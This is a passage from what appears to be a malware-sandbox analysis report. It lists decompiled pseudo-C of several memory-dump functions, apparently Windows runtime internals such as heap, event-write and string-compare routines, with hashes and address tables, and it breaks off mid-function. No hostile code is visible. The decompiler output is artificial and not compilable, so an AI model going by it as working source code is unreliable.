                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 4be317e0dfa66a306f088522db147a3d6de96d83d0655614d2967a80f25d91f1
                                                                              • Instruction ID: 52fd68d3f085ee4e669e94ca1a79653362f39ac6223d035aef7fd094c9711c21
                                                                              • Opcode Fuzzy Hash: 4be317e0dfa66a306f088522db147a3d6de96d83d0655614d2967a80f25d91f1
                                                                              • Instruction Fuzzy Hash: EB71BB32240606EFE732DE28C849F57FBA5EB84720F24452CE755876A0DB75EA44CB50
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017E6DC9 Relevance: .2, Instructions: 199COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 79%
                                                                              			E017E6DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L01784620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E017E6B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E01787D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E017A9AE0();
					_t87 = L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E017E795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E017E795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E017E795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E017E795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L01784620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E017E6B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E017E6B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E017E6B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E017E6B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E01787D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E017A9AE0();
								L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L01782400( &_v36);
							if(_v24 >= 0) {
								_t87 = L01782400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L01782400( &_v52);
							}
							if(_v28 >= 0) {
								return L01782400( &_v60);
							}
						}
					}
				}
				return _t87;
			}































                                                                              0x017e6dd4
                                                                              0x017e6dde
                                                                              0x017e6de1
                                                                              0x017e6de3
                                                                              0x017e6de6
                                                                              0x017e6de9
                                                                              0x017e6dec
                                                                              0x017e6def
                                                                              0x017e6df2
                                                                              0x017e6df5
                                                                              0x017e6dfe
                                                                              0x017e6e04
                                                                              0x017e6e09
                                                                              0x017e6e0d
                                                                              0x017e6e18
                                                                              0x017e6e1b
                                                                              0x017e6e22
                                                                              0x017e6e2d
                                                                              0x017e6e30
                                                                              0x017e6e36
                                                                              0x017e6e42
                                                                              0x017e6e4d
                                                                              0x017e6e50
                                                                              0x017e6e55
                                                                              0x017e6e5c
                                                                              0x017e6e6e
                                                                              0x017e6e5e
                                                                              0x017e6e67
                                                                              0x017e6e67
                                                                              0x017e6e73
                                                                              0x017e6e74
                                                                              0x017e6e77
                                                                              0x017e6e7c
                                                                              0x017e6e7d
                                                                              0x017e6e8e
                                                                              0x017e6e93
                                                                              0x017e6e9c
                                                                              0x017e6ea8
                                                                              0x017e6eab
                                                                              0x017e6eac
                                                                              0x017e6eb3
                                                                              0x017e6ecd
                                                                              0x017e6edc
                                                                              0x017e6ee2
                                                                              0x017e6ee5
                                                                              0x017e6ef2
                                                                              0x017e6efb
                                                                              0x017e6f01
                                                                              0x017e6f06
                                                                              0x017e6f0b
                                                                              0x017e6f11
                                                                              0x017e6f1a
                                                                              0x017e6f22
                                                                              0x017e6f26
                                                                              0x017e6f26
                                                                              0x017e6f33
                                                                              0x017e6f41
                                                                              0x017e6f44
                                                                              0x017e6f47
                                                                              0x017e6f54
                                                                              0x017e6f65
                                                                              0x017e6f77
                                                                              0x017e6f7c
                                                                              0x017e6f82
                                                                              0x017e6f91
                                                                              0x017e6f99
                                                                              0x017e6fa3
                                                                              0x017e6fae
                                                                              0x017e6fae
                                                                              0x017e6fba
                                                                              0x017e6fbb
                                                                              0x017e6fbc
                                                                              0x017e6fc1
                                                                              0x017e6fc2
                                                                              0x017e6fd3
                                                                              0x017e6fd8
                                                                              0x017e6fd8
                                                                              0x017e6fdf
                                                                              0x017e6fe8
                                                                              0x017e6fee
                                                                              0x017e6fee
                                                                              0x017e6ff5
                                                                              0x017e6ffb
                                                                              0x017e6ffb
                                                                              0x017e7004
                                                                              0x00000000
                                                                              0x017e700a
                                                                              0x017e7004
                                                                              0x017e6eb3
                                                                              0x017e6e9c
                                                                              0x017e7015

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                                              • Instruction ID: d79cc218e0106129098b946eab0e17ca47a5b852667b953a1acc44048b0901f2
                                                                              • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                                              • Instruction Fuzzy Hash: E5717071A0021AEFDB14EFA8C948AEEFBF9FF58714F104569E505E7254DB30AA41CB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017652A5 Relevance: .2, Instructions: 161COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 78%
                                                                              			E017652A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E0177EEF0(0x18579a0);
					_t104 =  *0x1858210; // 0x1302c48
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E0177EB70(_t93, 0x18579a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E017A9890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E0177EEF0(0x18579a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E0177EB70(0, 0x18579a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0x1302c55
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E0179F0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E0177EEF0(0x18579a0);
									__eflags =  *0x1858210 - _t104; // 0x1302c48
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x1858210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E017E4888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E0177EB70(_t95, 0x18579a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E017A95D0();
											L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E017A95D0();
											L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E0177EB70(_t93, 0x18579a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E017A95D0();
										L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E017A95D0();
										L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E0179F0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

























                                                                              0x017652a5
                                                                              0x017652ad
                                                                              0x017652b0
                                                                              0x017652b3
                                                                              0x017652b7
                                                                              0x017652ba
                                                                              0x017652bf
                                                                              0x017652c4
                                                                              0x017652cc
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017652ce
                                                                              0x017652d9
                                                                              0x017652dd
                                                                              0x017652e7
                                                                              0x017652f7
                                                                              0x017652f9
                                                                              0x017652fd
                                                                              0x017c0dcf
                                                                              0x017c0dd5
                                                                              0x017c0dd6
                                                                              0x017c0dd7
                                                                              0x017c0dd8
                                                                              0x017c0dd9
                                                                              0x017c0dde
                                                                              0x017c0ddf
                                                                              0x017c0de0
                                                                              0x017c0de1
                                                                              0x017c0de2
                                                                              0x017c0de5
                                                                              0x017c0dea
                                                                              0x017c0dec
                                                                              0x017c0f60
                                                                              0x017c0f64
                                                                              0x017c0f70
                                                                              0x017c0f76
                                                                              0x017c0f79
                                                                              0x017c0f79
                                                                              0x00000000
                                                                              0x017c0f64
                                                                              0x017c0df2
                                                                              0x017c0df7
                                                                              0x017c0e04
                                                                              0x017c0e0d
                                                                              0x017c0e0d
                                                                              0x017c0e10
                                                                              0x017c0e1a
                                                                              0x017c0e1c
                                                                              0x017c0e4c
                                                                              0x017c0e52
                                                                              0x017c0e61
                                                                              0x017c0e67
                                                                              0x017c0e6b
                                                                              0x017c0e70
                                                                              0x017c0e76
                                                                              0x017c0ed7
                                                                              0x017c0edc
                                                                              0x017c0ee0
                                                                              0x017c0ee6
                                                                              0x017c0eea
                                                                              0x017c0eed
                                                                              0x017c0ef0
                                                                              0x017c0ef3
                                                                              0x017c0ef6
                                                                              0x017c0ef9
                                                                              0x017c0efe
                                                                              0x017c0f01
                                                                              0x017c0f01
                                                                              0x017c0f0b
                                                                              0x017c0f12
                                                                              0x017c0f16
                                                                              0x017c0f18
                                                                              0x017c0f1b
                                                                              0x017c0f2c
                                                                              0x017c0f31
                                                                              0x017c0f31
                                                                              0x017c0f35
                                                                              0x017c0f39
                                                                              0x017c0f3a
                                                                              0x017c0f3c
                                                                              0x017c0f3f
                                                                              0x017c0f50
                                                                              0x017c0f55
                                                                              0x017c0f55
                                                                              0x017c0f59
                                                                              0x017652eb
                                                                              0x017652f1
                                                                              0x017652f1
                                                                              0x017c0e7d
                                                                              0x017c0e84
                                                                              0x017c0e88
                                                                              0x017c0e8a
                                                                              0x017c0e8d
                                                                              0x017c0e9e
                                                                              0x017c0ea3
                                                                              0x017c0ea3
                                                                              0x017c0ea7
                                                                              0x017c0eaf
                                                                              0x017c0eb3
                                                                              0x017c0eb9
                                                                              0x017c0eb9
                                                                              0x017c0ebc
                                                                              0x017c0ecd
                                                                              0x017c0ecd
                                                                              0x00000000
                                                                              0x017c0eb3
                                                                              0x017c0e21
                                                                              0x017c0e2b
                                                                              0x017c0e2f
                                                                              0x017c0e30
                                                                              0x017c0e3a
                                                                              0x017c0e3f
                                                                              0x017c0e41
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017c0e47
                                                                              0x00000000
                                                                              0x017c0e47
                                                                              0x017c0df9
                                                                              0x017c0dfe
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017c0dfe
                                                                              0x01765303
                                                                              0x01765307
                                                                              0x00000000
                                                                              0x01765309
                                                                              0x00000000
                                                                              0x01765309
                                                                              0x01765307
                                                                              0x017652e9
                                                                              0x017652e9
                                                                              0x00000000
                                                                              0x017652e9
                                                                              0x0176530e
                                                                              0x00000000

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 1bd5461d7650c705251b1c81f47263f4c833545369d25baea7e67ae81db35638
                                                                              • Instruction ID: 20296280ae4f9783197093f29adf5c4ee8cfa97b76eaf42af44b67bc4fc4db92
                                                                              • Opcode Fuzzy Hash: 1bd5461d7650c705251b1c81f47263f4c833545369d25baea7e67ae81db35638
                                                                              • Instruction Fuzzy Hash: 6A51D970149342AFD721EF28C844B26FBE8FF94B54F10091EF89583651E774E840CBA2
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 01792AE4 Relevance: .2, Instructions: 159COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E01792AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x1858204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x1858208; // 0x1858207
				_t8 = _t57 + 0x1858208; // 0x1858207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x1858450; // 0x0
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x185821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x1856d5c; // 0x7f4f0654
							_t72 =  *0x1856d5c; // 0x7f4f0654
							_t75 =  *0x1856d5c; // 0x7f4f0654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x1856d5c; // 0x7f4f0654
							_t84 =  *0x1856d5c; // 0x7f4f0654
							_t87 =  *0x1856d5c; // 0x7f4f0654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E017AF3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}






































                                                                              0x01792ae4
                                                                              0x01792aec
                                                                              0x01792aef
                                                                              0x01792af4
                                                                              0x01792af7
                                                                              0x01792afd
                                                                              0x01792b92
                                                                              0x01792b92
                                                                              0x01792b97
                                                                              0x01792b9c
                                                                              0x01792b9c
                                                                              0x01792b03
                                                                              0x01792b06
                                                                              0x01792b09
                                                                              0x01792b09
                                                                              0x01792b0f
                                                                              0x01792b15
                                                                              0x01792b15
                                                                              0x01792b1b
                                                                              0x01792b1e
                                                                              0x01792b21
                                                                              0x01792b26
                                                                              0x01792b29
                                                                              0x01792b81
                                                                              0x01792b84
                                                                              0x01792c0e
                                                                              0x01792c15
                                                                              0x01792c24
                                                                              0x01792c24
                                                                              0x01792b8a
                                                                              0x01792b8a
                                                                              0x01792b8a
                                                                              0x01792b8a
                                                                              0x01792b90
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x01792b4a
                                                                              0x01792b4a
                                                                              0x01792b4d
                                                                              0x01792b53
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x01792b55
                                                                              0x01792b58
                                                                              0x01792bb7
                                                                              0x017d5d1b
                                                                              0x017d5d37
                                                                              0x017d5d47
                                                                              0x017d5d53
                                                                              0x01792bbd
                                                                              0x01792bbd
                                                                              0x01792bbd
                                                                              0x01792bb7
                                                                              0x01792b5d
                                                                              0x01792c2f
                                                                              0x017d5d5b
                                                                              0x017d5d77
                                                                              0x017d5d87
                                                                              0x017d5d93
                                                                              0x01792c35
                                                                              0x01792c35
                                                                              0x01792c35
                                                                              0x01792c2f
                                                                              0x01792b65
                                                                              0x01792b9f
                                                                              0x01792ba2
                                                                              0x01792b67
                                                                              0x01792b67
                                                                              0x01792b69
                                                                              0x01792b6b
                                                                              0x01792b6e
                                                                              0x01792bc9
                                                                              0x01792bcc
                                                                              0x01792bcf
                                                                              0x01792bd4
                                                                              0x01792bd6
                                                                              0x01792bd6
                                                                              0x01792bdb
                                                                              0x01792c02
                                                                              0x01792c05
                                                                              0x01792c07
                                                                              0x00000000
                                                                              0x01792c07
                                                                              0x01792be0
                                                                              0x01792c00
                                                                              0x01792c3f
                                                                              0x01792c3f
                                                                              0x00000000
                                                                              0x01792c00
                                                                              0x01792be5
                                                                              0x01792be7
                                                                              0x01792bec
                                                                              0x01792bf4
                                                                              0x01792bf6
                                                                              0x00000000
                                                                              0x01792bf6
                                                                              0x01792b70
                                                                              0x01792b76
                                                                              0x01792b2b
                                                                              0x01792b2b
                                                                              0x01792b2d
                                                                              0x01792b2f
                                                                              0x01792b32
                                                                              0x01792b35
                                                                              0x01792b3a
                                                                              0x00000000
                                                                              0x01792b40
                                                                              0x01792b43
                                                                              0x01792b45
                                                                              0x01792b47
                                                                              0x01792b4a
                                                                              0x01792b4d
                                                                              0x01792b53
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x01792b53
                                                                              0x01792b78
                                                                              0x01792b78
                                                                              0x01792b7b
                                                                              0x01792b7e
                                                                              0x00000000
                                                                              0x01792b7e
                                                                              0x01792b76
                                                                              0x01792ba5
                                                                              0x01792ba5
                                                                              0x01792ba8
                                                                              0x01792bad
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x01792baf
                                                                              0x01792baf
                                                                              0x01792bc2
                                                                              0x00000000

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c17ea689bf1baf95b32fb5776f97e2bf30a885890ab307c2877db99668e3dda9
                                                                              • Instruction ID: d04e44b235181d9d01809db0ef800c12c490e4fa7050e7357d4c1428195d318d
                                                                              • Opcode Fuzzy Hash: c17ea689bf1baf95b32fb5776f97e2bf30a885890ab307c2877db99668e3dda9
                                                                              • Instruction Fuzzy Hash: E951BF76A00119DFCF18EF1CD8809BDF7F1FB98700715845AE8469B326E734AA49CB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0182AE44 Relevance: .2, Instructions: 152COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 86%
                                                                              			E0182AE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
				signed int _v8;
				signed int _v12;
				void* __esi;
				void* __ebp;
				signed short* _t36;
				signed int _t41;
				char* _t42;
				intOrPtr _t43;
				signed int _t47;
				void* _t52;
				signed int _t57;
				intOrPtr _t61;
				signed char _t62;
				signed int _t72;
				signed char _t85;
				signed int _t88;

				_t73 = __edx;
				_push(__ecx);
				_t85 = __ecx;
				_v8 = __edx;
				_t61 =  *((intOrPtr*)(__ecx + 0x28));
				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
					_t57 = _t57 | 0x00000001;
				}
				_t88 = 0;
				_t36 = 0;
				_t96 = _a12;
				if(_a12 == 0) {
					_t62 = _a8;
					__eflags = _t62;
					if(__eflags == 0) {
						goto L12;
					}
					_t52 = E0182C38B(_t85, _t73, _t57, 0);
					_t62 = _a8;
					 *_t62 = _t52;
					_t36 = 0;
					goto L11;
				} else {
					_t36 = E0182ACFD(_t85, _t73, _t96, _t57, _a8);
					if(0 == 0 || 0 == 0xffffffff) {
						_t72 = _t88;
					} else {
						_t72 =  *0x00000000 & 0x0000ffff;
					}
					 *_a12 = _t72;
					_t62 = _a8;
					L11:
					_t73 = _v8;
					L12:
					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
						L19:
						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
							L22:
							_t74 = _v8;
							__eflags = _v8;
							if(__eflags != 0) {
								L25:
								__eflags = _t88 - 2;
								if(_t88 != 2) {
									__eflags = _t85 + 0x44 + (_t88 << 6);
									_t88 = E0182FDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
									goto L34;
								}
								L26:
								_t59 = _v8;
								E0182EA55(_t85, _v8, _t57);
								asm("sbb esi, esi");
								_t88 =  ~_t88;
								_t41 = E01787D50();
								__eflags = _t41;
								if(_t41 == 0) {
									_t42 = 0x7ffe0380;
								} else {
									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								}
								__eflags =  *_t42;
								if( *_t42 != 0) {
									_t43 =  *[fs:0x30];
									__eflags =  *(_t43 + 0x240) & 0x00000001;
									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
										__eflags = _t88;
										if(_t88 != 0) {
											E01821608(_t85, _t59, 3);
										}
									}
								}
								goto L34;
							}
							_push(_t62);
							_t47 = E01831536(0x1858ae4, (_t74 -  *0x1858b04 >> 0x14) + (_t74 -  *0x1858b04 >> 0x14), _t88, __eflags);
